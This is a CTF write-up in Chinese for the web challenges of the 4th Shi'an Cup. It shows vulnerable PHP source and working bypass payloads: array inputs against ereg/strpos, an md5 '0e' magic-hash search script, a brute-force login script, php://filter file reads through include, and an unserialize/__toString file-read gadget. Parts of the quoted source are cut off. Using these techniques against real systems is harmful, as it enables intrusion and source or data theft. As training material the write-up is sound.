[第四届世安杯](web)writeup

ctf入门级题目

You password must be alphanumeric

'; else if (strpos ($_GET['password'], '--') !== FALSE) die($flag); else echo '

Invalid password

'; } ?>

利用ereg和strpos处理数组时的缺陷:传入数组时两个函数都返回NULL而不是FALSE,与FALSE的严格比较因此全部失效。提交?password[]=1

flag{Maybe_using_rexpexp_wasnt_a_clever_move}

曲奇饼

观察链接,file后面是一段base64,解码为key.txt,并没有什么用。将index.php进行base64编码后作为file参数,然后不断修改line逐行读取源码。

'key.txt', 
'1' =>'index.php', 
); 
// The flag file joins the allow-list only when the request carries a cookie
// named "key" equal to this constant. index.php is itself on the allow-list,
// so the constant can be read through this same script and is not a secret.
if(isset($_COOKIE['key']) && $_COOKIE['key']=='li_lr_480'){ 
$file_list[2]='thisis_flag.php'; 
} 
// Only names present in $file_list are read. in_array() is called without its
// strict flag, so the match uses loose comparison.
// $file and $line are set above this excerpt (not shown here).
if(in_array($file, $file_list)){ 
// file() loads the file as an array of lines; the one selected by $line is echoed.
$fa = file($file); 
echo $fa[$line]; 
} 
?>

view-source:http://ctf1.shiyanbar.com/shian-quqi/index.php?line=&file=dGhpc2lzX2ZsYWcucGhw

flag{UHGgd3rfH*(3HFhuiEIWF}

类型

 2017)?$b=1:NULL;
    }
    if(is_array(@$x2["x22"])){
        if(count($x2["x22"])!==2 OR !is_array($x2["x22"][0])) die("ha?");
        $p = array_search("XIPU", $x2["x22"]);
        $p===false?die("ha?"):NULL;
        foreach($x2["x22"] as $key=>$val){
            $val==="XIPU"?die("ha?"):NULL;
        }
        $c=1;
}
}
// Third check: x3 must differ from '15562' under loose comparison, contain
// 'XIPU', and share a 16-character md5 slice (offset 8) with '15562'.
$x3 = $_GET['x3'];
if ($x3 != '15562') {
    if (strstr($x3, 'XIPU')) {
        // NOTE(review): `==` between two digest slices is a loose comparison. When
        // both slices read as "0e<digits>" PHP compares them as numbers and both
        // evaluate to 0, so different digests compare equal. Presumably the slice
        // of md5('15562') has that form -- confirm. Comparing with `===` or
        // hash_equals() removes the numeric interpretation.
        if (substr(md5($x3),8,16) == substr(md5('15562'),8,16)) {
            $d=1;
        }
    }
}
// The flag is printed only when all four check variables are truthy.
if($a && $b && $c && $d){
    include "flag.php";
    echo $flag;
}
?> 

最后:
x1=1a&x2={"x21":"2018a","x22":[[0],0]}&x3=XIPU18570

绕过x3的脚本

import hashlib

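def _is_zero_exponent_slice(digest):
    """Return True when digest[8:24] is "0e" followed only by decimal digits.

    That slice is the 16 characters PHP's ``substr(md5($x), 8, 16)`` yields.
    PHP's loose ``==`` compares two numeric-looking strings as numbers, so
    every "0e<digits>" string equals every other one (all evaluate to 0).
    Comparing digests with ``===`` or ``hash_equals()`` closes that gap.
    """
    window = digest[8:24]
    # A hex digest holds only 0-9 and a-f, so "no letters" means "all digits".
    return window[:2] == '0e' and window[2:].isdigit()


def find_magic_candidate(prefix='XIPU', limit=1000000):
    """Return the first ``prefix + str(i)`` whose md5 slice passes the check.

    Args:
        prefix: Text that every candidate starts with.
        limit: Number of counters to try, starting from 0.

    Returns:
        The first matching candidate string, or None when none of the
        ``limit`` candidates matches.
    """
    for i in range(limit):
        candidate = prefix + str(i)
        # hashlib requires bytes on Python 3; the candidates are plain ASCII.
        digest = hashlib.md5(candidate.encode('ascii')).hexdigest()
        if _is_zero_exponent_slice(digest):
            return candidate
    return None


if __name__ == '__main__':
    found = find_magic_candidate()
    if found is not None:
        print(found)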

CTF{Php_1s_bstl4_1a}

登录

源码提示:``,那就直接进行爆破好了

import requests
import re

# One session object is shared by every request below. A requests.Session
# keeps cookies between calls, so the page fetch that yields the code and the
# login request that submits it presumably share one server-side session.
s = requests.Session()


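def get_rancode():
    """Fetch the challenge page and return the first three-digit run in its HTML.

    The request goes through the module-level session ``s``.

    Returns:
        The matched three-character digit string.

    Raises:
        IndexError: The response contains no three consecutive digits.
    """
    response = s.get("http://ctf1.shiyanbar.com/shian-s/index.php")
    # Raw string: '\d' in a plain literal is an invalid escape sequence that
    # newer Python versions warn about.
    # NOTE(review): this takes the first three consecutive digits anywhere in
    # the HTML, which is the code only if no other number precedes it.
    match = re.search(r'\d\d\d', response.text)
    if match is None:
        raise IndexError("no three-digit code found in the response")
    return match.group(0)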

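if __name__ == '__main__':
    # Every attempt first fetches a fresh code with get_rancode() and then
    # submits it together with the candidate password.
    # NOTE(review): a numeric code that the page hands to every client does not
    # slow automated guessing. Only server-side attempt limiting or lockout
    # bounds a loop like this one.
    for password in range(9999, 99999):
        code = get_rancode()
        url = "http://ctf1.shiyanbar.com/shian-s/index.php?username=admin&password={}&randcode={}".format(
            password, code)
        response = s.get(url)

        # The loop stops at the first response whose body mentions "flag".
        if "flag" in response.text:
            print(url)
            break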
        

脚本哪错了?没跑出来,不懂

admin

$user = $_GET["user"];
$file = $_GET["file"];
$pass = $_GET["pass"];

if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){
    echo "hello admin!
"; include($file); //class.php }else{ echo "you are not admin ! ";

读取class.php:

http://ctf1.shiyanbar.com/shian-du/index.php?user=http://120.27.32.227/3.txt&file=php://filter/convert.base64-encode/resource=class.php&pass=1

file)){
            echo file_get_contents($this->file);    
        }
        return "__toString was called!";
    }
}

读取index.php:

";
    // Only paths containing the literal "f1a9" are refused. Every other value
    // of $file reaches include(), stream wrappers such as php://filter included.
    if(preg_match("/f1a9/",$file)){
        exit();
    }else{
        include($file); //class.php
        // NOTE(review): $pass appears to come straight from the query string
        // (see the $_GET assignments earlier on this page). unserialize() on
        // request data lets the client choose the class and property values of
        // the resulting object. Prefer json_decode(), or pass
        // ['allowed_classes' => false] as the second argument.
        $pass = unserialize($pass);
        // echo converts the value to a string; for an object that invokes its
        // __toString() method.
        echo $pass;
    }
}else{
    echo "you are not admin ! ";
}

?>


                    
